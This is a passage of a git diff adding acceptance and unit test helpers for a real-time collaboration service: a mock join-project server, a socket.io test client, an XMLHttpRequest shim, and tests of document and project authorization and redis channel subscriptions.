!!userMetadata?.isRestrictedUser, + isTokenMember: !!userMetadata?.isTokenMember, + isInvitedMember: !!userMetadata?.isInvitedMember, + }) + } + ) + } + }, + + running: false, + run(callback) { + if (callback == null) { + callback = function () {} + } + if (MockWebServer.running) { + return callback() + } + const app = express() + app.use(bodyParser.json()) + app.post('/project/:project_id/join', MockWebServer.joinProjectRequest) + return app + .listen(3000, error => { + MockWebServer.running = true + return callback(error) + }) + .on('error', error => { + console.error('error starting MockWebServer:', error.message) + return process.exit(1) + }) + }, +} + +sinon.spy(MockWebServer, 'joinProject') diff --git a/services/real-time/test/acceptance/js/helpers/RealTimeClient.js b/services/real-time/test/acceptance/js/helpers/RealTimeClient.js new file mode 100644 index 0000000..7b53f5d --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/RealTimeClient.js @@ -0,0 +1,165 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
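+//
+// A sketch of how the acceptance tests drive this client: set up a session
+// first, then connect, then join a doc (names follow the helpers below):
+//
+//   RealTimeClient.setSession({ user: { _id: userId } }, () => {
+//     const client = RealTimeClient.connect(projectId, err => {
+//       if (!err) client.emit('joinDoc', docId, cb)
+//     })
+//   })
+//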
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let Client +const { XMLHttpRequest } = require('../../libs/XMLHttpRequest') +const io = require('socket.io-client') +const async = require('async') + +const request = require('request') +const Settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(Settings.redis.websessions) + +const uid = require('uid-safe').sync +const signature = require('cookie-signature') + +io.util.request = function () { + const xhr = new XMLHttpRequest() + const _open = xhr.open + xhr.open = function () { + _open.apply(xhr, arguments) + if (Client.cookie != null) { + return xhr.setRequestHeader('Cookie', Client.cookie) + } + } + return xhr +} + +module.exports = Client = { + cookie: null, + + setSession(session, callback) { + if (callback == null) { + callback = function () {} + } + const sessionId = uid(24) + session.cookie = {} + return rclient.set('sess:' + sessionId, JSON.stringify(session), error => { + if (error != null) { + return callback(error) + } + Client.cookieSignedWith = {} + // prepare cookie strings for all supported session secrets + for (const secretName of [ + 'sessionSecret', + 'sessionSecretFallback', + 'sessionSecretUpcoming', + ]) { + const secret = Settings.security[secretName] + const cookieKey = 's:' + signature.sign(sessionId, secret) + Client.cookieSignedWith[secretName] = + `${Settings.cookieName}=${cookieKey}` + } + // default to the current session secret + Client.cookie = Client.cookieSignedWith.sessionSecret + return callback() + }) + }, + + setAnonSession(projectId, anonymousAccessToken, callback) { + Client.setSession( + { + anonTokenAccess: { + [projectId]: anonymousAccessToken, + }, + }, + callback + ) + }, + + unsetSession(callback) { + if (callback == null) { + callback = function () {} + } + Client.cookie = null + return callback() + }, + + connect(projectId, callback) { + const client = io.connect('http://127.0.0.1:3026', { + 'force new connection': true, + query: new URLSearchParams({ projectId }).toString(), + }) + let disconnected = false + client.on('disconnect', () => { + disconnected = true + }) + client.on('connectionRejected', err => { + // Wait for disconnect ahead of continuing with the test sequence. 
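+      // (The server is expected to close the socket right after emitting
+      // connectionRejected; the short delay below gives it time to do so.)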
+ setTimeout(() => { + if (!disconnected) { + throw new Error('should disconnect after connectionRejected') + } + callback(err) + }, 10) + }) + client.on('joinProjectResponse', resp => { + const { publicId, project, permissionsLevel, protocolVersion } = resp + client.publicId = publicId + callback(null, project, permissionsLevel, protocolVersion) + }) + return client + }, + + getConnectedClients(callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: 'http://127.0.0.1:3026/clients', + json: true, + }, + (error, response, data) => callback(error, data) + ) + }, + + getConnectedClient(clientId, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `http://127.0.0.1:3026/clients/${clientId}`, + json: true, + }, + (error, response, data) => { + if (response?.statusCode === 404) { + callback(new Error('not found')) + } else { + callback(error, data) + } + } + ) + }, + + disconnectClient(clientId, callback) { + request.post( + { + url: `http://127.0.0.1:3026/client/${clientId}/disconnect`, + }, + (error, response, data) => callback(error, data) + ) + return null + }, + + disconnectAllClients(callback) { + return Client.getConnectedClients((error, clients) => { + if (error) return callback(error) + async.each( + clients, + (clientView, cb) => Client.disconnectClient(clientView.client_id, cb), + callback + ) + }) + }, +} diff --git a/services/real-time/test/acceptance/js/helpers/RealtimeServer.js b/services/real-time/test/acceptance/js/helpers/RealtimeServer.js new file mode 100644 index 0000000..be3a6f4 --- /dev/null +++ b/services/real-time/test/acceptance/js/helpers/RealtimeServer.js @@ -0,0 +1,61 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } else { + this.initing = true + this.callbacks.push(callback) + return app.listen( + __guard__( + Settings.internal != null ? Settings.internal.realtime : undefined, + x => x.port + ), + '127.0.0.1', + error => { + if (error != null) { + throw error + } + this.running = true + logger.info('clsi running in dev mode') + + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + } + ) + } + }, +} + +function __guard__(value, transform) { + return typeof value !== 'undefined' && value !== null + ? 
transform(value) + : undefined +} diff --git a/services/real-time/test/acceptance/libs/XMLHttpRequest.js b/services/real-time/test/acceptance/libs/XMLHttpRequest.js new file mode 100644 index 0000000..3586f44 --- /dev/null +++ b/services/real-time/test/acceptance/libs/XMLHttpRequest.js @@ -0,0 +1,579 @@ +/** + * Wrapper for built-in http.js to emulate the browser XMLHttpRequest object. + * + * This can be used with JS designed for browsers to improve reuse of code and + * allow the use of existing libraries. + * + * Usage: include("XMLHttpRequest.js") and use XMLHttpRequest per W3C specs. + * + * @author Dan DeFelippi <dan@driverdan.com> + * @contributor David Ellis <d.f.ellis@ieee.org> + * @license MIT + */ + +const { URL } = require('node:url') +const spawn = require('node:child_process').spawn +const fs = require('node:fs') + +exports.XMLHttpRequest = function () { + /** + * Private variables + */ + const self = this + const http = require('node:http') + const https = require('node:https') + + // Holds http.js objects + let request + let response + + // Request settings + let settings = {} + + // Set some default headers + const defaultHeaders = { + 'User-Agent': 'node-XMLHttpRequest', + Accept: '*/*', + } + + let headers = defaultHeaders + + // These headers are not user setable. + // The following are allowed but banned in the spec: + // * user-agent + const forbiddenRequestHeaders = [ + 'accept-charset', + 'accept-encoding', + 'access-control-request-headers', + 'access-control-request-method', + 'connection', + 'content-length', + 'content-transfer-encoding', + // "cookie", + 'cookie2', + 'date', + 'expect', + 'host', + 'keep-alive', + 'origin', + 'referer', + 'te', + 'trailer', + 'transfer-encoding', + 'upgrade', + 'via', + ] + + // These request methods are not allowed + const forbiddenRequestMethods = ['TRACE', 'TRACK', 'CONNECT'] + + // Send flag + let sendFlag = false + // Error flag, used when errors occur or abort is called + let errorFlag = false + + // Event listeners + const listeners = {} + + /** + * Constants + */ + + this.UNSENT = 0 + this.OPENED = 1 + this.HEADERS_RECEIVED = 2 + this.LOADING = 3 + this.DONE = 4 + + /** + * Public vars + */ + + // Current state + this.readyState = this.UNSENT + + // default ready state change handler in case one is not set or is set late + this.onreadystatechange = null + + // Result & response + this.responseText = '' + this.responseXML = '' + this.status = null + this.statusText = null + + /** + * Private methods + */ + + /** + * Check if the specified header is allowed. + * + * @param string header Header to validate + * @return boolean False if not allowed, otherwise true + */ + const isAllowedHttpHeader = function (header) { + return ( + header && forbiddenRequestHeaders.indexOf(header.toLowerCase()) === -1 + ) + } + + /** + * Check if the specified method is allowed. + * + * @param string method Request method to validate + * @return boolean False if not allowed, otherwise true + */ + const isAllowedHttpMethod = function (method) { + return method && forbiddenRequestMethods.indexOf(method) === -1 + } + + /** + * Public methods + */ + + /** + * Open the connection. Currently supports local server requests. + * + * @param string method Connection method (eg GET, POST) + * @param string url URL for the connection. + * @param boolean async Asynchronous connection. Default is true. 
+ * @param string user Username for basic authentication (optional) + * @param string password Password for basic authentication (optional) + */ + this.open = function (method, url, async, user, password) { + this.abort() + errorFlag = false + + // Check for valid request method + if (!isAllowedHttpMethod(method)) { + throw new Error('SecurityError: Request method not allowed') + } + + settings = { + method, + url: url.toString(), + async: typeof async !== 'boolean' ? true : async, + user: user || null, + password: password || null, + } + + setState(this.OPENED) + } + + /** + * Sets a header for the request. + * + * @param string header Header name + * @param string value Header value + */ + this.setRequestHeader = function (header, value) { + if (this.readyState !== this.OPENED) { + throw new Error( + 'INVALID_STATE_ERR: setRequestHeader can only be called when state is OPEN' + ) + } + if (!isAllowedHttpHeader(header)) { + console.warn('Refused to set unsafe header "' + header + '"') + return + } + if (sendFlag) { + throw new Error('INVALID_STATE_ERR: send flag is true') + } + headers[header] = value + } + + /** + * Gets a header from the server response. + * + * @param string header Name of header to get. + * @return string Text of the header or null if it doesn't exist. + */ + this.getResponseHeader = function (header) { + if ( + typeof header === 'string' && + this.readyState > this.OPENED && + response.headers[header.toLowerCase()] && + !errorFlag + ) { + return response.headers[header.toLowerCase()] + } + + return null + } + + /** + * Gets all the response headers. + * + * @return string A string with all response headers separated by CR+LF + */ + this.getAllResponseHeaders = function () { + if (this.readyState < this.HEADERS_RECEIVED || errorFlag) { + return '' + } + let result = '' + + for (const i in response.headers) { + // Cookie headers are excluded + if (i !== 'set-cookie' && i !== 'set-cookie2') { + result += i + ': ' + response.headers[i] + '\r\n' + } + } + return result.substr(0, result.length - 2) + } + + /** + * Gets a request header + * + * @param string name Name of header to get + * @return string Returns the request header or empty string if not set + */ + this.getRequestHeader = function (name) { + // @TODO Make this case insensitive + if (typeof name === 'string' && headers[name]) { + return headers[name] + } + + return '' + } + + /** + * Sends the request to the server. + * + * @param string data Optional data to send as request body. 
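+   *
+   * Example (a sketch; the URL is illustrative):
+   *   const xhr = new XMLHttpRequest()
+   *   xhr.open('POST', 'http://127.0.0.1:3000/project/123/join')
+   *   xhr.setRequestHeader('Content-Type', 'application/json')
+   *   xhr.send(JSON.stringify({ userId: 'abc' }))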
+ */ + this.send = function (data) { + if (this.readyState !== this.OPENED) { + throw new Error( + 'INVALID_STATE_ERR: connection must be opened before send() is called' + ) + } + + if (sendFlag) { + throw new Error('INVALID_STATE_ERR: send has already been called') + } + + let host + let ssl = false + let local = false + const url = new URL(settings.url) + + // Determine the server + switch (url.protocol) { + case 'https:': + ssl = true + host = url.hostname + break + case 'http:': + host = url.hostname + break + + case 'file:': + local = true + break + + case undefined: + case '': + host = '127.0.0.1' + break + + default: + throw new Error('Protocol not supported.') + } + + // Load files off the local filesystem (file://) + if (local) { + if (settings.method !== 'GET') { + throw new Error('XMLHttpRequest: Only GET method is supported') + } + + if (settings.async) { + fs.readFile(url.pathname, 'utf8', (error, data) => { + if (error) { + self.handleError(error) + } else { + self.status = 200 + self.responseText = data + setState(self.DONE) + } + }) + } else { + try { + this.responseText = fs.readFileSync(url.pathname, 'utf8') + this.status = 200 + setState(self.DONE) + } catch (e) { + this.handleError(e) + } + } + + return + } + + // Default to port 80. If accessing 127.0.0.1 on another port be sure + // to use http://127.0.0.1:port/path + const port = url.port || (ssl ? 443 : 80) + // Add query string if one is used + const uri = url.pathname + (url.search ? url.search : '') + + // Set the Host header or the server may reject the request + headers.Host = host + if (!((ssl && port === 443) || port === 80)) { + headers.Host += ':' + url.port + } + + // Set Basic Auth if necessary + if (settings.user) { + if (typeof settings.password === 'undefined') { + settings.password = '' + } + const authBuf = Buffer.from(settings.user + ':' + settings.password) + headers.Authorization = 'Basic ' + authBuf.toString('base64') + } + + // Set content length header + if (settings.method === 'GET' || settings.method === 'HEAD') { + data = null + } else if (data) { + headers['Content-Length'] = Buffer.byteLength(data) + + if (!headers['Content-Type']) { + headers['Content-Type'] = 'text/plain;charset=UTF-8' + } + } else if (settings.method === 'POST') { + // For a post with no data set Content-Length: 0. + // This is required by buggy servers that don't meet the specs. + headers['Content-Length'] = 0 + } + + const options = { + host, + port, + path: uri, + method: settings.method, + headers, + } + + // Reset error flag + errorFlag = false + + // Handle async requests + if (settings.async) { + // Use the proper protocol + const doRequest = ssl ? https.request : http.request + + // Request is being sent, set send flag + sendFlag = true + + // As per spec, this is called here for historical reasons. + self.dispatchEvent('readystatechange') + + // Create the request + request = doRequest(options, resp => { + response = resp + response.setEncoding('utf8') + + setState(self.HEADERS_RECEIVED) + self.status = response.statusCode + + response.on('data', chunk => { + // Make sure there's some data + if (chunk) { + self.responseText += chunk + } + // Don't emit state changes if the connection has been aborted. 
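+            // (abort() clears the send flag, so chunks that arrive after an
+            // abort are still appended above but no LOADING event fires.)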
+ if (sendFlag) { + setState(self.LOADING) + } + }) + + response.on('end', () => { + if (sendFlag) { + // Discard the 'end' event if the connection has been aborted + setState(self.DONE) + sendFlag = false + } + }) + + response.on('error', error => { + self.handleError(error) + }) + }).on('error', error => { + self.handleError(error) + }) + + // Node 0.4 and later won't accept empty data. Make sure it's needed. + if (data) { + request.write(data) + } + + request.end() + + self.dispatchEvent('loadstart') + } else { + // Synchronous + // Create a temporary file for communication with the other Node process + const syncFile = '.node-xmlhttprequest-sync-' + process.pid + fs.writeFileSync(syncFile, '', 'utf8') + // The async request the other Node process executes + const execString = + "var http = require('http'), https = require('https'), fs = require('fs');" + + 'var doRequest = http' + + (ssl ? 's' : '') + + '.request;' + + 'var options = ' + + JSON.stringify(options) + + ';' + + "var responseText = '';" + + 'var req = doRequest(options, function(response) {' + + "response.setEncoding('utf8');" + + "response.on('data', function(chunk) {" + + 'responseText += chunk;' + + '});' + + "response.on('end', function() {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-STATUS:' + response.statusCode + ',' + responseText, 'utf8');" + + '});' + + "response.on('error', function(error) {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-ERROR:' + JSON.stringify(error), 'utf8');" + + '});' + + "}).on('error', function(error) {" + + "fs.writeFileSync('" + + syncFile + + "', 'NODE-XMLHTTPREQUEST-ERROR:' + JSON.stringify(error), 'utf8');" + + '});' + + (data ? "req.write('" + data.replace(/'/g, "\\'") + "');" : '') + + 'req.end();' + // Start the other Node Process, executing this string + const syncProc = spawn(process.argv[0], ['-e', execString]) + while ((self.responseText = fs.readFileSync(syncFile, 'utf8')) === '') { + // Wait while the file is empty + } + // Kill the child process once the file has data + syncProc.stdin.end() + // Remove the temporary file + fs.unlinkSync(syncFile) + if (self.responseText.match(/^NODE-XMLHTTPREQUEST-ERROR:/)) { + // If the file returned an error, handle it + const errorObj = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-ERROR:/, + '' + ) + self.handleError(errorObj) + } else { + // If the file returned okay, parse its data and move to the DONE state + self.status = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-STATUS:([0-9]*),.*/, + '$1' + ) + self.responseText = self.responseText.replace( + /^NODE-XMLHTTPREQUEST-STATUS:[0-9]*,(.*)/, + '$1' + ) + setState(self.DONE) + } + } + } + + /** + * Called when an error is encountered to deal with it. + */ + this.handleError = function (error) { + this.status = 503 + this.statusText = error + this.responseText = error.stack + errorFlag = true + setState(this.DONE) + } + + /** + * Aborts a request. + */ + this.abort = function () { + if (request) { + request.abort() + request = null + } + + headers = defaultHeaders + this.responseText = '' + this.responseXML = '' + + errorFlag = true + + if ( + this.readyState !== this.UNSENT && + (this.readyState !== this.OPENED || sendFlag) && + this.readyState !== this.DONE + ) { + sendFlag = false + setState(this.DONE) + } + this.readyState = this.UNSENT + } + + /** + * Adds an event listener. Preferred method of binding to events. 
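+   *
+   * Example: xhr.addEventListener('load', function () { ... })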
+ */ + this.addEventListener = function (event, callback) { + if (!(event in listeners)) { + listeners[event] = [] + } + // Currently allows duplicate callbacks. Should it? + listeners[event].push(callback) + } + + /** + * Remove an event callback that has already been bound. + * Only works on the matching funciton, cannot be a copy. + */ + this.removeEventListener = function (event, callback) { + if (event in listeners) { + // Filter will return a new array with the callback removed + listeners[event] = listeners[event].filter(ev => { + return ev !== callback + }) + } + } + + /** + * Dispatch any events, including both "on" methods and events attached using addEventListener. + */ + this.dispatchEvent = function (event) { + if (typeof self['on' + event] === 'function') { + self['on' + event]() + } + if (event in listeners) { + for (let i = 0, len = listeners[event].length; i < len; i++) { + listeners[event][i].call(self) + } + } + } + + /** + * Changes readyState and calls onreadystatechange. + * + * @param int state New state + */ + function setState(state) { + if (self.readyState !== state) { + self.readyState = state + + if ( + settings.async || + self.readyState < self.OPENED || + self.readyState === self.DONE + ) { + self.dispatchEvent('readystatechange') + } + + if (self.readyState === self.DONE && !errorFlag) { + self.dispatchEvent('load') + // @TODO figure out InspectorInstrumentation::didLoadXHR(cookie) + self.dispatchEvent('loadend') + } + } + } +} diff --git a/services/real-time/test/setup.js b/services/real-time/test/setup.js new file mode 100644 index 0000000..c213049 --- /dev/null +++ b/services/real-time/test/setup.js @@ -0,0 +1,47 @@ +const chai = require('chai') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const chaiAsPromised = require('chai-as-promised') +const sinonChai = require('sinon-chai') + +// Chai configuration +chai.should() +chai.use(chaiAsPromised) +chai.use(sinonChai) + +// Global stubs +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + }, +} + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + }, + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +// Mocha hooks +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/real-time/test/unit/js/AuthorizationManagerTests.js b/services/real-time/test/unit/js/AuthorizationManagerTests.js new file mode 100644 index 0000000..a23d814 --- /dev/null +++ b/services/real-time/test/unit/js/AuthorizationManagerTests.js @@ -0,0 +1,428 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
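+//
+// Privilege levels exercised below (summarising this file's assertions):
+//   view:   readOnly, readAndWrite, review, owner
+//   edit:   readAndWrite, owner
+//   review: review
+// Any other privilege level yields a 'not authorized' error.
+//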
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const path = require('node:path') +const modulePath = '../../../app/js/AuthorizationManager' + +describe('AuthorizationManager', function () { + beforeEach(function () { + this.client = { ol_context: {} } + + return (this.AuthorizationManager = SandboxedModule.require(modulePath, { + requires: {}, + })) + }) + + describe('assertClientCanViewProject', function () { + it('should allow the readOnly privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readOnly' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the readAndWrite privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readAndWrite' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the review privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'review' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the owner privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'owner' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('should return an error with any other privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'unknown' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + }) + + describe('assertClientCanEditProject', function () { + it('should not allow the readOnly privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readOnly' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + + it('should allow the readAndWrite privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readAndWrite' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the owner privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'owner' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('should return an error with any other privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'unknown' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + }) + + // check doc access for project + + describe('assertClientCanViewProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the 
project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'unknown') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) + + describe('assertClientCanEditProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readAndWrite') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + 
this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) + + return describe('assertClientCanReviewProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'review') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) +}) diff --git 
a/services/real-time/test/unit/js/ChannelManagerTests.js b/services/real-time/test/unit/js/ChannelManagerTests.js new file mode 100644 index 0000000..2e51c58 --- /dev/null +++ b/services/real-time/test/unit/js/ChannelManagerTests.js @@ -0,0 +1,432 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') +const modulePath = '../../../app/js/ChannelManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ChannelManager', function () { + beforeEach(function () { + this.rclient = {} + this.other_rclient = {} + return (this.ChannelManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + summary: sinon.stub(), + }), + }, + })) + }) + + describe('subscribe', function () { + describe('when there is no existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should subscribe to the redis channel', function () { + return this.rclient.subscribe + .calledWithExactly('applied-ops:1234567890abcdef') + .should.equal(true) + }) + }) + + describe('when there is an existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should subscribe to the redis channel again', function () { + return this.rclient.subscribe.callCount.should.equal(2) + }) + }) + + describe('when subscribe errors', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon + .stub() + .onFirstCall() + .rejects(new Error('some redis error')) + .onSecondCall() + .resolves() + const p = this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + p.then(() => done(new Error('should not subscribe but fail'))).catch( + err => { + err.message.should.equal('failed to subscribe to channel') + err.cause.message.should.equal('some redis error') + this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + // subscribe is wrapped in Promise, delay other assertions + return setTimeout(done) + } + ) + return null + }) + + it('should have recorded the error', function () { + return expect( + this.metrics.inc.calledWithExactly('subscribe.failed.applied-ops') + ).to.equal(true) + }) + + it('should subscribe again', function () { + return this.rclient.subscribe.callCount.should.equal(2) + }) + + return it('should cleanup', function () { + return this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + }) + }) + + describe('when subscribe errors and the clientChannelMap entry was 
replaced', function () {
+      beforeEach(function (done) {
+        this.rclient.subscribe = sinon
+          .stub()
+          .onFirstCall()
